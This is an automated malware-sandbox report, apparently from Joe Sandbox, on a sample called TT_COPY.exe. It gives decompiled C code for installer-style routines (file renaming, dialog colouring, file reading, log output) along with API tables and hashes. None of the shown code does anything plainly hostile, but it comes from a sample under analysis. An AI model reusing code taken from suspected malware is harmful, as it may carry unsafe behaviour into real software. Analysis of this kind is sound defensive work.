                                                                                                                            										_t31 = _t31 - 1;
                                                                                                                            										_t39 = _t39 - 1;
                                                                                                                            									}
                                                                                                                            									_t24 = _t49 - _t46 + 1;
                                                                                                                            									_t48 =  *(_t53 + 0x18);
                                                                                                                            									goto L17;
                                                                                                                            								}
                                                                                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                            								_t42 = _t42 + 0xa;
                                                                                                                            								goto L16;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					CloseHandle(E0040602D(_t44, 0, 1));
                                                                                                                            					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                            						goto L3;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				return _t12;
                                                                                                                            			}



















                                                                                                                            0x00406183
                                                                                                                            0x0040618c
                                                                                                                            0x00406193
                                                                                                                            0x0040619d
                                                                                                                            0x004061b1
                                                                                                                            0x004061d9
                                                                                                                            0x004061e4
                                                                                                                            0x004061e8
                                                                                                                            0x00406208
                                                                                                                            0x0040620f
                                                                                                                            0x00406219
                                                                                                                            0x00406226
                                                                                                                            0x0040622b
                                                                                                                            0x00406230
                                                                                                                            0x00406234
                                                                                                                            0x00406243
                                                                                                                            0x00406245
                                                                                                                            0x00406252
                                                                                                                            0x00406256
                                                                                                                            0x004062f1
                                                                                                                            0x00000000
                                                                                                                            0x0040626c
                                                                                                                            0x00406279
                                                                                                                            0x0040629d
                                                                                                                            0x004062a1
                                                                                                                            0x004062c0
                                                                                                                            0x004062c4
                                                                                                                            0x004062c4
                                                                                                                            0x004062c6
                                                                                                                            0x004062cf
                                                                                                                            0x004062da
                                                                                                                            0x004062e5
                                                                                                                            0x004062eb
                                                                                                                            0x00000000
                                                                                                                            0x004062eb
                                                                                                                            0x004062a3
                                                                                                                            0x004062a6
                                                                                                                            0x004062b1
                                                                                                                            0x004062ad
                                                                                                                            0x004062af
                                                                                                                            0x004062b0
                                                                                                                            0x004062b0
                                                                                                                            0x004062b8
                                                                                                                            0x004062ba
                                                                                                                            0x00000000
                                                                                                                            0x004062ba
                                                                                                                            0x00406284
                                                                                                                            0x0040628a
                                                                                                                            0x00000000
                                                                                                                            0x0040628a
                                                                                                                            0x00406256
                                                                                                                            0x00406234
                                                                                                                            0x004061b3
                                                                                                                            0x004061be
                                                                                                                            0x004061c7
                                                                                                                            0x004061cb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004061cb
                                                                                                                            0x004062fc

                                                                                                                            APIs
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                            • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                            • wsprintfA.USER32 ref: 00406202
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\TT_COPY.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                            • Opcode ID: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                                                                                                                            • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                            • Opcode Fuzzy Hash: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                                                                                                                            • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                            				struct tagLOGBRUSH _v16;
                                                                                                                            				long _t39;
                                                                                                                            				long _t41;
                                                                                                                            				void* _t44;
                                                                                                                            				signed char _t50;
                                                                                                                            				long* _t54;
                                                                                                                            
                                                                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                                                                            					L18:
                                                                                                                            					return 0;
                                                                                                                            				}
                                                                                                                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                            					goto L18;
                                                                                                                            				} else {
                                                                                                                            					_t50 = _t54[5];
                                                                                                                            					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                            						goto L18;
                                                                                                                            					}
                                                                                                                            					_t39 =  *_t54;
                                                                                                                            					if((_t50 & 0x00000002) != 0) {
                                                                                                                            						_t39 = GetSysColor(_t39);
                                                                                                                            					}
                                                                                                                            					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                            						SetTextColor(_a8, _t39);
                                                                                                                            					}
                                                                                                                            					SetBkMode(_a8, _t54[4]);
                                                                                                                            					_t41 = _t54[1];
                                                                                                                            					_v16.lbColor = _t41;
                                                                                                                            					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                            						_t41 = GetSysColor(_t41);
                                                                                                                            						_v16.lbColor = _t41;
                                                                                                                            					}
                                                                                                                            					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                            						SetBkColor(_a8, _t41);
                                                                                                                            					}
                                                                                                                            					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                            						_v16.lbStyle = _t54[2];
                                                                                                                            						_t44 = _t54[3];
                                                                                                                            						if(_t44 != 0) {
                                                                                                                            							DeleteObject(_t44);
                                                                                                                            						}
                                                                                                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                            					}
                                                                                                                            					return _t54[3];
                                                                                                                            				}
                                                                                                                            			}









                                                                                                                            0x00404512
                                                                                                                            0x004045c8
                                                                                                                            0x00000000
                                                                                                                            0x004045c8
                                                                                                                            0x00404523
                                                                                                                            0x00404527
                                                                                                                            0x00000000
                                                                                                                            0x00404541
                                                                                                                            0x00404541
                                                                                                                            0x0040454a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040454c
                                                                                                                            0x00404558
                                                                                                                            0x0040455b
                                                                                                                            0x0040455b
                                                                                                                            0x00404561
                                                                                                                            0x00404567
                                                                                                                            0x00404567
                                                                                                                            0x00404573
                                                                                                                            0x00404579
                                                                                                                            0x00404580
                                                                                                                            0x00404583
                                                                                                                            0x00404586
                                                                                                                            0x00404588
                                                                                                                            0x00404588
                                                                                                                            0x00404590
                                                                                                                            0x00404596
                                                                                                                            0x00404596
                                                                                                                            0x004045a0
                                                                                                                            0x004045a5
                                                                                                                            0x004045a8
                                                                                                                            0x004045ad
                                                                                                                            0x004045b0
                                                                                                                            0x004045b0
                                                                                                                            0x004045c0
                                                                                                                            0x004045c0
                                                                                                                            0x00000000
                                                                                                                            0x004045c3

                                                                                                                            APIs
                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                            • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                            • GetSysColor.USER32(?), ref: 00404586
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                            • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2320649405-0
                                                                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                            • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                            • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                                                            				intOrPtr _t65;
                                                                                                                            				intOrPtr _t66;
                                                                                                                            				intOrPtr _t72;
                                                                                                                            				void* _t76;
                                                                                                                            				void* _t79;
                                                                                                                            
                                                                                                                            				_t72 = __edx;
                                                                                                                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                                                            				_t65 = 2;
                                                                                                                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                                                            				_t66 = E00402D84(_t65);
                                                                                                                            				_t79 = _t66 - 1;
                                                                                                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                                                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                                                            				if(_t79 < 0) {
                                                                                                                            					L36:
                                                                                                                            					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                                                                            				} else {
                                                                                                                            					__ecx = 0x3ff;
                                                                                                                            					if(__eax > 0x3ff) {
                                                                                                                            						 *(__ebp - 0x44) = 0x3ff;
                                                                                                                            					}
                                                                                                                            					if( *__edi == __bx) {
                                                                                                                            						L34:
                                                                                                                            						__ecx =  *(__ebp - 0xc);
                                                                                                                            						__eax =  *(__ebp - 8);
                                                                                                                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                                                            						if(_t79 == 0) {
                                                                                                                            							 *(_t76 - 4) = 1;
                                                                                                                            						}
                                                                                                                            						goto L36;
                                                                                                                            					} else {
                                                                                                                            						 *(__ebp - 0x38) = __ebx;
                                                                                                                            						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                                                                                            						if( *(__ebp - 0x44) > __ebx) {
                                                                                                                            							do {
                                                                                                                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                                                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                                                            										__eax = __ebp - 0x50;
                                                                                                                            										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                                                            											goto L34;
                                                                                                                            										} else {
                                                                                                                            											goto L21;
                                                                                                                            										}
                                                                                                                            									} else {
                                                                                                                            										goto L34;
                                                                                                                            									}
                                                                                                                            								} else {
                                                                                                                            									__eax = __ebp - 0x40;
                                                                                                                            									_push(__ebx);
                                                                                                                            									_push(__ebp - 0x40);
                                                                                                                            									__eax = 2;
                                                                                                                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                                                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                                                            									if(__eax == 0) {
                                                                                                                            										goto L34;
                                                                                                                            									} else {
                                                                                                                            										__ecx =  *(__ebp - 0x40);
                                                                                                                            										if(__ecx == __ebx) {
                                                                                                                            											goto L34;
                                                                                                                            										} else {
                                                                                                                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                                                            											 *(__ebp - 0x4c) = __ecx;
                                                                                                                            											 *(__ebp - 0x50) = __eax;
                                                                                                                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                            												L28:
                                                                                                                            												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                                                            											} else {
                                                                                                                            												__ebp - 0x50 = __ebp + 0xa;
                                                                                                                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                                                            													L21:
                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                            												} else {
                                                                                                                            													__edi =  *(__ebp - 0x4c);
                                                                                                                            													__edi =  ~( *(__ebp - 0x4c));
                                                                                                                            													while(1) {
                                                                                                                            														_t22 = __ebp - 0x40;
                                                                                                                            														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                                                            														__eax = 0xfffd;
                                                                                                                            														 *(__ebp - 0x50) = 0xfffd;
                                                                                                                            														if( *_t22 == 0) {
                                                                                                                            															goto L22;
                                                                                                                            														}
                                                                                                                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                                                            														__edi = __edi + 1;
                                                                                                                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                                                            														__eax = __ebp + 0xa;
                                                                                                                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                                                            															continue;
                                                                                                                            														} else {
                                                                                                                            															goto L21;
                                                                                                                            														}
                                                                                                                            														goto L22;
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            												L22:
                                                                                                                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                            													goto L28;
                                                                                                                            												} else {
                                                                                                                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                                                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                                                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                                                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                                                            														} else {
                                                                                                                            															__ecx =  *(__ebp - 0xc);
                                                                                                                            															__edx =  *(__ebp - 8);
                                                                                                                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                            														}
                                                                                                                            														goto L34;
                                                                                                                            													} else {
                                                                                                                            														__ecx =  *(__ebp - 0xc);
                                                                                                                            														__edx =  *(__ebp - 8);
                                                                                                                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                            														 *(__ebp - 0x38) = __eax;
                                                                                                                            														if(__ax == __bx) {
                                                                                                                            															goto L34;
                                                                                                                            														} else {
                                                                                                                            															goto L26;
                                                                                                                            														}
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								goto L37;
                                                                                                                            								L26:
                                                                                                                            								__eax =  *(__ebp - 8);
                                                                                                                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                                                            						}
                                                                                                                            						goto L34;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				L37:
                                                                                                                            				return 0;
                                                                                                                            			}








                                                                                                                            0x004026ec
                                                                                                                            0x004026ee
                                                                                                                            0x004026f1
                                                                                                                            0x004026f3
                                                                                                                            0x004026f6
                                                                                                                            0x004026fb
                                                                                                                            0x004026ff
                                                                                                                            0x00402702
                                                                                                                            0x00402705
                                                                                                                            0x00402c2a
                                                                                                                            0x00402c2d
                                                                                                                            0x0040270b
                                                                                                                            0x0040270b
                                                                                                                            0x00402712
                                                                                                                            0x00402714
                                                                                                                            0x00402714
                                                                                                                            0x0040271a
                                                                                                                            0x0040287e
                                                                                                                            0x0040287e
                                                                                                                            0x00402881
                                                                                                                            0x00402886
                                                                                                                            0x004015b6
                                                                                                                            0x0040292e
                                                                                                                            0x0040292e
                                                                                                                            0x00000000
                                                                                                                            0x00402720
                                                                                                                            0x00402721
                                                                                                                            0x0040272c
                                                                                                                            0x0040272f
                                                                                                                            0x0040273b
                                                                                                                            0x0040273f
                                                                                                                            0x004027d7
                                                                                                                            0x004027ef
                                                                                                                            0x004027ff
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402745
                                                                                                                            0x00402745
                                                                                                                            0x00402748
                                                                                                                            0x00402749
                                                                                                                            0x0040274c
                                                                                                                            0x00402751
                                                                                                                            0x00402758
                                                                                                                            0x00402760
                                                                                                                            0x00000000
                                                                                                                            0x00402766
                                                                                                                            0x00402766
                                                                                                                            0x0040276b
                                                                                                                            0x00000000
                                                                                                                            0x00402771
                                                                                                                            0x00402771
                                                                                                                            0x00402779
                                                                                                                            0x0040277c
                                                                                                                            0x0040277f
                                                                                                                            0x0040283a
                                                                                                                            0x00402841
                                                                                                                            0x00402785
                                                                                                                            0x0040278b
                                                                                                                            0x00402797
                                                                                                                            0x00402801
                                                                                                                            0x00402801
                                                                                                                            0x00402799
                                                                                                                            0x00402799
                                                                                                                            0x0040279c
                                                                                                                            0x0040279e
                                                                                                                            0x0040279e
                                                                                                                            0x0040279e
                                                                                                                            0x004027a1
                                                                                                                            0x004027a6
                                                                                                                            0x004027a9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004027ab
                                                                                                                            0x004027ae
                                                                                                                            0x004027bc
                                                                                                                            0x004027c2
                                                                                                                            0x004027d0
                                                                                                                            0x00000000
                                                                                                                            0x004027d2
                                                                                                                            0x00000000
                                                                                                                            0x004027d2
                                                                                                                            0x00000000
                                                                                                                            0x004027d0
                                                                                                                            0x0040279e
                                                                                                                            0x00402804
                                                                                                                            0x00402807
                                                                                                                            0x00000000
                                                                                                                            0x00402809
                                                                                                                            0x0040280e
                                                                                                                            0x0040284f
                                                                                                                            0x00402871
                                                                                                                            0x00402878
                                                                                                                            0x0040285d
                                                                                                                            0x0040285d
                                                                                                                            0x00402860
                                                                                                                            0x00402863
                                                                                                                            0x00402866
                                                                                                                            0x00402866
                                                                                                                            0x00000000
                                                                                                                            0x00402817
                                                                                                                            0x00402817
                                                                                                                            0x0040281a
                                                                                                                            0x0040281d
                                                                                                                            0x00402823
                                                                                                                            0x00402827
                                                                                                                            0x0040282a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040282a
                                                                                                                            0x0040280e
                                                                                                                            0x00402807
                                                                                                                            0x0040277f
                                                                                                                            0x0040276b
                                                                                                                            0x00402760
                                                                                                                            0x00000000
                                                                                                                            0x0040282c
                                                                                                                            0x0040282c
                                                                                                                            0x0040282f
                                                                                                                            0x00402838
                                                                                                                            0x00000000
                                                                                                                            0x0040272f
                                                                                                                            0x0040271a
                                                                                                                            0x00402c33
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                              • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                            • String ID: 9
                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                            • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                            • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                            • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                            • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040559F(signed int _a4, WCHAR* _a8) {
                                                                                                                            				struct HWND__* _v8;
                                                                                                                            				signed int _v12;
                                                                                                                            				WCHAR* _v32;
                                                                                                                            				long _v44;
                                                                                                                            				int _v48;
                                                                                                                            				void* _v52;
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				WCHAR* _t27;
                                                                                                                            				signed int _t28;
                                                                                                                            				long _t29;
                                                                                                                            				signed int _t37;
                                                                                                                            				signed int _t38;
                                                                                                                            
                                                                                                                            				_t27 =  *0x433ee4;
                                                                                                                            				_v8 = _t27;
                                                                                                                            				if(_t27 != 0) {
                                                                                                                            					_t37 =  *0x434fb4;
                                                                                                                            					_v12 = _t37;
                                                                                                                            					_t38 = _t37 & 0x00000001;
                                                                                                                            					if(_t38 == 0) {
                                                                                                                            						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                                                                            					}
                                                                                                                            					_t27 = lstrlenW(0x42c248);
                                                                                                                            					_a4 = _t27;
                                                                                                                            					if(_a8 == 0) {
                                                                                                                            						L6:
                                                                                                                            						if((_v12 & 0x00000004) == 0) {
                                                                                                                            							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
                                                                                                                            						}
                                                                                                                            						if((_v12 & 0x00000002) == 0) {
                                                                                                                            							_v32 = 0x42c248;
                                                                                                                            							_v52 = 1;
                                                                                                                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                                                                            							_v44 = 0;
                                                                                                                            							_v48 = _t29 - _t38;
                                                                                                                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                                                                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                                                                            						}
                                                                                                                            						if(_t38 != 0) {
                                                                                                                            							_t28 = _a4;
                                                                                                                            							0x42c248[_t28] = 0;
                                                                                                                            							return _t28;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						_t27 = lstrlenW(_a8) + _a4;
                                                                                                                            						if(_t27 < 0x1000) {
                                                                                                                            							_t27 = lstrcatW(0x42c248, _a8);
                                                                                                                            							goto L6;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				return _t27;
                                                                                                                            			}

















                                                                                                                            0x004055a5
                                                                                                                            0x004055af
                                                                                                                            0x004055b4
                                                                                                                            0x004055ba
                                                                                                                            0x004055c5
                                                                                                                            0x004055c8
                                                                                                                            0x004055cb
                                                                                                                            0x004055d1
                                                                                                                            0x004055d1
                                                                                                                            0x004055d7
                                                                                                                            0x004055df
                                                                                                                            0x004055e2
                                                                                                                            0x004055ff
                                                                                                                            0x00405603
                                                                                                                            0x0040560c
                                                                                                                            0x0040560c
                                                                                                                            0x00405616
                                                                                                                            0x0040561f
                                                                                                                            0x0040562b
                                                                                                                            0x00405632
                                                                                                                            0x00405636
                                                                                                                            0x00405639
                                                                                                                            0x0040564c
                                                                                                                            0x0040565a
                                                                                                                            0x0040565a
                                                                                                                            0x0040565e
                                                                                                                            0x00405660
                                                                                                                            0x00405663
                                                                                                                            0x00000000
                                                                                                                            0x00405663
                                                                                                                            0x004055e4
                                                                                                                            0x004055ec
                                                                                                                            0x004055f4
                                                                                                                            0x004055fa
                                                                                                                            0x00000000
                                                                                                                            0x004055fa
                                                                                                                            0x004055f4
                                                                                                                            0x004055e2
                                                                                                                            0x0040566f

                                                                                                                            APIs
